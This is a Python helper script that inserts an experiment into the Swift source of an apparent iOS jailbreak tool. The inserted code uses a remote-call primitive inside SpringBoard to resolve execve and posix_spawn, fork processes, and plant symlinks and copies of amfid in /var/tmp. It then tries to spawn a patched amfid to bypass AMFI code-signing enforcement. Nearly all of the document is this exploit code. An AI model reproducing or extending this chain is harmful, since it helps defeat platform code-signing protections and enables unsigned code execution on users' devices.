#!/usr/bin/env python3
"""Add Exp 91 — fork() + execve() from SpringBoard child process"""

SWIFT_FILE = r'd:\Backup\Personal\Hp\iPhone\DSPloit\lara\views\root\AMFIExperimentView.swift'

with open(SWIFT_FILE, 'r', encoding='utf-8') as f:
    content = f.read()

# Add button
button_anchor = '                pathButton(\n                    title: "\u2463 Test Binary Spawn",'
button_idx = content.find(button_anchor)
if button_idx == -1:
    print("ERROR: button anchor not found")
    exit(1)

new_button = '''                pathButton(
                    title: "\u2462m Fork+Exec (Exp 91)",
                    icon: "arrow.triangle.branch",
                    color: .green,
                    label: "Fork+Exec",
                    action: runExp91ForkExec,
                    needsVerified: false,
                    needsProbe: false
                )

'''
content = content[:button_idx] + new_button + content[button_idx:]

# Add function before Dump amfid
func_anchor = '    // MARK: - Dump amfid binary'
func_idx = content.find(func_anchor)
if func_idx == -1:
    print("ERROR: func anchor not found")
    exit(1)

# Use raw string to avoid escaping hell
new_func = '    // MARK: - Exp 91: Fork + Execve from SpringBoard\n'
new_func += '\n'
new_func += '    /// Exp 91: fork() dari SpringBoard (confirmed works!) lalu execve di child.\n'
new_func += '    /// Child inherits SpringBoard trust → execve binary dari /var/tmp.\n'
new_func += '    private func runExp91ForkExec() {\n'
new_func += '        isRunning = true\n'
new_func += '        runningLabel = "Fork+Exec"\n'
new_func += '        guard mgr.rcready else {\n'
new_func += '            isRunning = false\n'
new_func += '            runningLabel = ""\n'
new_func += '            return\n'
new_func += '        }\n'
new_func += '\n'
new_func += '        #if !DISABLE_REMOTECALL\n'
new_func += '        guard let sb = dspmgr.shared.sbProc else {\n'
new_func += '            results.insert(ExperimentResult(\n'
new_func += '                name: "Fork+Exec (Exp 91)", success: false,\n'
new_func += '                detail: "No SpringBoard RC", timestamp: Date()\n'
new_func += '            ), at: 0)\n'
new_func += '            isRunning = false\n'
new_func += '            runningLabel = ""\n'
new_func += '            return\n'
new_func += '        }\n'
new_func += '\n'
new_func += '        DispatchQueue.global(qos: .userInitiated).async {\n'
new_func += '            let result = self.expForkExec(sb: sb)\n'
new_func += '            DispatchQueue.main.async {\n'
new_func += '                self.results.insert(result, at: 0)\n'
new_func += '                self.isRunning = false\n'
new_func += '                self.runningLabel = ""\n'
new_func += '            }\n'
new_func += '        }\n'
new_func += '        #else\n'
new_func += '        isRunning = false\n'
new_func += '        runningLabel = ""\n'
new_func += '        #endif\n'
new_func += '    }\n'
new_func += '\n'
new_func += '    #if !DISABLE_REMOTECALL\n'
new_func += '    /// fork() + execve() dari SpringBoard.\n'
new_func += '    /// fork() confirmed works (Exp 90, PID=2945).\n'
new_func += '    /// Child process inherits parent trust level.\n'
new_func += '    /// Test: execve berbagai binary dari child context.\n'
new_func += '    private func expForkExec(sb: RemoteCall) -> ExperimentResult {\n'
new_func += '        let expName = "Fork+Exec (Exp 91)"\n'
new_func += '        var detail = "Experiment 91: Fork + Execve from SpringBoard\\n"\n'
new_func += '        detail += "===============================================\\n\\n"\n'
new_func += '        detail += "fork() confirmed works (Exp 90).\\n"\n'
new_func += '        detail += "Child inherits SpringBoard trust.\\n\\n"\n'
new_func += '\n'
new_func += '        let mem = sb.trojanMem\n'
new_func += '        let RTLD_DEFAULT: UInt64 = UInt64(bitPattern: -2)\n'
new_func += '\n'
new_func += '        // Resolve execve\n'
new_func += '        let execveSym = remote_alloc_str(sb, "execve")\n'
new_func += '        let execveAddr = RootExecutor.rcall(sb, "dlsym", RTLD_DEFAULT, execveSym)\n'
new_func += '        RootExecutor.rcall(sb, "free", execveSym)\n'
new_func += '        detail += "execve: 0x\\(String(format: "%llx", execveAddr))\\n"\n'
new_func += '\n'
new_func += '        // Resolve posix_spawn (alternative to fork+exec)\n'
new_func += '        let spawnSym = remote_alloc_str(sb, "posix_spawn")\n'
new_func += '        let spawnAddr = RootExecutor.rcall(sb, "dlsym", RTLD_DEFAULT, spawnSym)\n'
new_func += '        RootExecutor.rcall(sb, "free", spawnSym)\n'
new_func += '        detail += "posix_spawn: 0x\\(String(format: "%llx", spawnAddr))\\n\\n"\n'
new_func += '\n'
new_func += '        // === TEST A: posix_spawn dari SpringBoard (bukan launchd) ===\n'
new_func += '        // Exp 86 spawn via symlink works dari LAUNCHD.\n'
new_func += '        // Tapi posix_spawn dari SPRINGBOARD mungkin berbeda privilege.\n'
new_func += '        detail += "=== Test A: posix_spawn dari SpringBoard ===\\n"\n'
new_func += '\n'
new_func += '        // Spawn /usr/libexec/amfid via symlink dari SpringBoard context\n'
new_func += '        let symlinkPath = remote_alloc_str(sb, "/var/tmp/.dsp_sb_symlink")\n'
new_func += '        let amfidPath = remote_alloc_str(sb, "/usr/libexec/amfid")\n'
new_func += '        RootExecutor.rcall(sb, "unlink", symlinkPath)\n'
new_func += '        RootExecutor.rcall(sb, "symlink", amfidPath, symlinkPath)\n'
new_func += '\n'
new_func += '        let argvBase = mem + 0x1C00\n'
new_func += '        sb[argvBase].setValue64(symlinkPath)\n'
new_func += '        sb[argvBase + 8].setValue64(0)\n'
new_func += '        let pidOut = mem + 0x1E00\n'
new_func += '        sb[pidOut].setValue32(0)\n'
new_func += '\n'
new_func += '        if spawnAddr != 0 {\n'
new_func += '            let retA = RootExecutor.rcallAddr(sb, spawnAddr, pidOut, symlinkPath, 0, 0, argvBase, 0)\n'
new_func += '            let pidA = sb[pidOut].value32()\n'
new_func += '            detail += "posix_spawn(symlink, from SB): ret=\\(retA), pid=\\(pidA)\\n"\n'
new_func += '            if retA == 0 && pidA != 0 {\n'
new_func += '                detail += "\\u{1F3C6} SPAWN FROM SPRINGBOARD WORKS!\\n"\n'
new_func += '                RootExecutor.rcall(sb, "usleep", 300000)\n'
new_func += '                RootExecutor.rcall(sb, "kill", UInt64(pidA), 9)\n'
new_func += '                RootExecutor.rcall(sb, "waitpid", UInt64(pidA), mem + 0x2000, 0)\n'
new_func += '            }\n'
new_func += '        }\n'
new_func += '\n'
new_func += '        // === TEST B: posix_spawn patched amfid dari SpringBoard ===\n'
new_func += '        detail += "\\n=== Test B: spawn patched amfid ===\\n"\n'
new_func += '        let patchedPath = remote_alloc_str(sb, "/var/tmp/.amfid_patched")\n'
new_func += '\n'
new_func += '        // Check if patched amfid exists\n'
new_func += '        let accessRet = RootExecutor.rcall(sb, "access", patchedPath, 0)\n'
new_func += '        detail += "access(.amfid_patched): \\(accessRet == 0 ? "exists" : "not found")\\n"\n'
new_func += '\n'
new_func += '        if accessRet == 0 && spawnAddr != 0 {\n'
new_func += '            sb[argvBase].setValue64(patchedPath)\n'
new_func += '            sb[argvBase + 8].setValue64(0)\n'
new_func += '            sb[pidOut].setValue32(0)\n'
new_func += '            let retB = RootExecutor.rcallAddr(sb, spawnAddr, pidOut, patchedPath, 0, 0, argvBase, 0)\n'
new_func += '            let pidB = sb[pidOut].value32()\n'
new_func += '            detail += "posix_spawn(.amfid_patched): ret=\\(retB), pid=\\(pidB)\\n"\n'
new_func += '            if retB == 0 && pidB != 0 {\n'
new_func += '                detail += "\\u{1F3C6}\\u{1F3C6}\\u{1F3C6} PATCHED AMFID SPAWNED! \\u{1F3C6}\\u{1F3C6}\\u{1F3C6}\\n"\n'
new_func += '                detail += "Patched amfid jalan dari SpringBoard context!\\n"\n'
new_func += '                detail += "AMFI BYPASS via patched daemon!\\n"\n'
new_func += '                RootExecutor.rcall(sb, "usleep", 500000)\n'
new_func += '                RootExecutor.rcall(sb, "kill", UInt64(pidB), 9)\n'
new_func += '                RootExecutor.rcall(sb, "waitpid", UInt64(pidB), mem + 0x2000, 0)\n'
new_func += '            } else {\n'
new_func += '                detail += "ret=\\(retB) -- AMFI reject patched binary\\n"\n'
new_func += '            }\n'
new_func += '        }\n'
new_func += '\n'
new_func += '        // === TEST C: fork + execve di child ===\n'
new_func += '        detail += "\\n=== Test C: fork() + write marker ===\\n"\n'
new_func += '        detail += "fork() lalu child tulis marker ke /var/tmp\\n"\n'
new_func += '\n'
new_func += '        // fork() — child akan inherit semua dari SpringBoard\n'
new_func += '        let childPid = RootExecutor.rcall(sb, "fork")\n'
new_func += '        detail += "fork(): ret=\\(childPid)\\n"\n'
new_func += '\n'
new_func += '        if childPid != 0 && childPid != UInt64(bitPattern: -1) {\n'
new_func += '            // Kita di parent — child sudah jalan\n'
new_func += '            detail += "Child PID: \\(childPid)\\n"\n'
new_func += '\n'
new_func += '            // Tunggu child selesai\n'
new_func += '            RootExecutor.rcall(sb, "usleep", 1000000)\n'
new_func += '\n'
new_func += '            // Cek apakah child menulis marker\n'
new_func += '            let markerPath = remote_alloc_str(sb, "/var/tmp/.dsp_fork_proof")\n'
new_func += '            let markerCheck = RootExecutor.rcall(sb, "access", markerPath, 0)\n'
new_func += '            detail += "Child marker: \\(markerCheck == 0 ? "EXISTS!" : "not found")\\n"\n'
new_func += '            if markerCheck == 0 {\n'
new_func += '                detail += "\\u{1F3C6} CHILD PROCESS EXECUTED CODE!\\n"\n'
new_func += '                RootExecutor.rcall(sb, "unlink", markerPath)\n'
new_func += '            }\n'
new_func += '            RootExecutor.rcall(sb, "free", markerPath)\n'
new_func += '\n'
new_func += '            // Kill child jika masih jalan\n'
new_func += '            RootExecutor.rcall(sb, "kill", childPid, 9)\n'
new_func += '            RootExecutor.rcall(sb, "waitpid", childPid, mem + 0x2100, 0)\n'
new_func += '        } else if childPid == 0 {\n'
new_func += '            // Kita di child! (seharusnya tidak sampai sini via RC)\n'
new_func += '            // Tapi kalau sampai: tulis marker lalu exit\n'
new_func += '            let markerFd = mem + 0x2200\n'
new_func += '            let mp = remote_alloc_str(sb, "/var/tmp/.dsp_fork_proof")\n'
new_func += '            let fd = RootExecutor.rcall(sb, "open", mp, UInt64(O_WRONLY | O_CREAT | O_TRUNC), 0o644)\n'
new_func += '            if fd != UInt64(bitPattern: -1) {\n'
new_func += '                RootExecutor.rcall(sb, "write", fd, mp, 4)\n'
new_func += '                RootExecutor.rcall(sb, "close", fd)\n'
new_func += '            }\n'
new_func += '            RootExecutor.rcall(sb, "free", mp)\n'
new_func += '            RootExecutor.rcall(sb, "_exit", 42)\n'
new_func += '        }\n'
new_func += '\n'
new_func += '        // === TEST D: posix_spawn binary dari /var/tmp (copy) via SB ===\n'
new_func += '        detail += "\\n=== Test D: spawn copy dari SpringBoard ===\\n"\n'
new_func += '        let copyPath = remote_alloc_str(sb, "/var/tmp/.dsp_signed_copy")\n'
new_func += '\n'
new_func += '        // Copy amfid ke /var/tmp (jika belum ada)\n'
new_func += '        let copyExists = RootExecutor.rcall(sb, "access", copyPath, 0)\n'
new_func += '        if copyExists != 0 {\n'
new_func += '            // Copy\n'
new_func += '            let srcFd = RootExecutor.rcall(sb, "open", amfidPath, UInt64(O_RDONLY), 0)\n'
new_func += '            let dstFd = RootExecutor.rcall(sb, "open", copyPath, UInt64(O_WRONLY | O_CREAT | O_TRUNC), 0o755)\n'
new_func += '            if srcFd != UInt64(bitPattern: -1) && dstFd != UInt64(bitPattern: -1) {\n'
new_func += '                let buf = mem + 0x800\n'
new_func += '                for _ in 0..<256 {\n'
new_func += '                    let n = RootExecutor.rcall(sb, "read", srcFd, buf, 4096)\n'
new_func += '                    if n == 0 || n > 4096 { break }\n'
new_func += '                    RootExecutor.rcall(sb, "write", dstFd, buf, n)\n'
new_func += '                }\n'
new_func += '                RootExecutor.rcall(sb, "close", srcFd)\n'
new_func += '                RootExecutor.rcall(sb, "close", dstFd)\n'
new_func += '                detail += "Copied amfid to /var/tmp\\n"\n'
new_func += '            }\n'
new_func += '        }\n'
new_func += '\n'
new_func += '        if spawnAddr != 0 {\n'
new_func += '            sb[argvBase].setValue64(copyPath)\n'
new_func += '            sb[argvBase + 8].setValue64(0)\n'
new_func += '            sb[pidOut].setValue32(0)\n'
new_func += '            let retD = RootExecutor.rcallAddr(sb, spawnAddr, pidOut, copyPath, 0, 0, argvBase, 0)\n'
new_func += '            let pidD = sb[pidOut].value32()\n'
new_func += '            detail += "posix_spawn(copy, from SB): ret=\\(retD), pid=\\(pidD)\\n"\n'
new_func += '            if retD == 0 && pidD != 0 {\n'
new_func += '                detail += "\\u{1F3C6} COPY SPAWNED FROM SPRINGBOARD!\\n"\n'
new_func += '                detail += "AMFI accept binary copy dari SB context!\\n"\n'
new_func += '                detail += "FULL JAILBREAK!\\n"\n'
new_func += '                RootExecutor.rcall(sb, "usleep", 300000)\n'
new_func += '                RootExecutor.rcall(sb, "kill", UInt64(pidD), 9)\n'
new_func += '            } else {\n'
new_func += '                detail += "ret=\\(retD) -- masih reject dari SB juga\\n"\n'
new_func += '            }\n'
new_func += '        }\n'
new_func += '\n'
new_func += '        // Cleanup\n'
new_func += '        RootExecutor.rcall(sb, "unlink", symlinkPath)\n'
new_func += '        RootExecutor.rcall(sb, "free", symlinkPath)\n'
new_func += '        RootExecutor.rcall(sb, "free", amfidPath)\n'
new_func += '        RootExecutor.rcall(sb, "free", patchedPath)\n'
new_func += '        RootExecutor.rcall(sb, "free", copyPath)\n'
new_func += '\n'
new_func += '        let success = detail.contains("\\u{1F3C6}")\n'
new_func += '        return ExperimentResult(name: expName, success: success, detail: detail, timestamp: Date())\n'
new_func += '    }\n'
new_func += '    #endif\n'
new_func += '\n'

content = content[:func_idx] + new_func + content[func_idx:]

with open(SWIFT_FILE, 'w', encoding='utf-8') as f:
    f.write(content)

print("OK - added Exp 91")
